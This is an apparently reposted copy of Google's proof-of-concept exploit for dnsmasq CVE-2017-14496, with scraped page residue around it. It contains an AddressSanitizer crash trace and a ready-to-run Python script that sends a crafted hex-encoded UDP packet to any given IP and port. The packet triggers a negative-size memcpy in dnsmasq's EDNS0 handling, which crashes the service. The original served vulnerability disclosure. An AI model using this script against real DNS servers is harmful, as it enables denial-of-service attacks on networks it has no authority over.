扫码分享
验证:
体验盒子'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.
=================================================================
==2215==ERROR: AddressSanitizer: negative-size-param: (size=-4)
#0 0x4b55be in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b55be)
#1 0x59a70e in add_pseudoheader /test/dnsmasq/src/edns0.c:164:8
#2 0x59bae8 in add_edns0_config /test/dnsmasq/src/edns0.c:424:12
#3 0x530b6b in forward_query /test/dnsmasq/src/forward.c:407:20
#4 0x534699 in receive_query /test/dnsmasq/src/forward.c:1448:16
#5 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
#6 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
#7 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#8 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x62200001ca2e is located 302 bytes inside of 5131-byte region [0x62200001c900,0x62200001dd0b)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
#3 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: negative-size-param (/test/dnsmasq/src/dnsmasq+0x4b55be) in __asan_memcpy
==2215==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
#Fermin J. Serna <fjserna@google.com>
#Felix Wilhelm <fwilhelm@google.com>
#Gabriel Campana <gbrl@google.com>
#Kevin Hamacher <hamacher@google.com>
#Gynvael Coldwin <gynvael@google.com>
#Ron Bowes - Xoogler :/
import socket
import sys
def negative_size_param():
data = '''00 00 00 0000 00 00 00 00 00 00 04
00 00 29 00 00 3a 00 0000 01 13 fe 32 01 13 79
00 00 00 00 00 00 00 0100 00 00 61 00 08 08 08
08 08 08 08 08 08 08 0808 08 08 00 00 00 00 00
00 00 00 6f 29 fb ff ffff 00 00 00 00 00 00 00
00 00 03 00 00 00 00 0000 00 00 02 8d 00 00 00
f9 00 00 00 00 00 00 0000 00 00 00 5c 00 00 00
01 ff ff 00 35 13 01 0d06 1b 00 00 00 00 00 00
00 00 00 00 00 04 00 0029 00 00 3a 00 00 00 01
13 00 08 01 00 00 00 0000 00 01 00 00 00 61 00
08 08 08 08 08 08 08 0808 13 08 08 08 00 00 00
00 00 00 00 00 00 6f 29fb ff ff ff 00 29 00 00
00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00
00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00
00 00 02 8d 00 00 00 f900 00 00 00 00 00 00 00
00 00 00 00 00 01 00 0000 00 00 00 01 ff ff 00
35 13 00 00 00 00 00 b600 00 13 00 00 00 00 00
00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00
00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00
00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00
00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00
00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00
00 00 00 00 00 00 00 0000 00 00 00 00 00 61 05
01 20 00 01
'''.replace(' ', '').replace('\n', '').decode('hex')
return data
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>' % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
packet = negative_size_param()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
s.sendto(packet, (ip, port))
s.close()
体验盒子
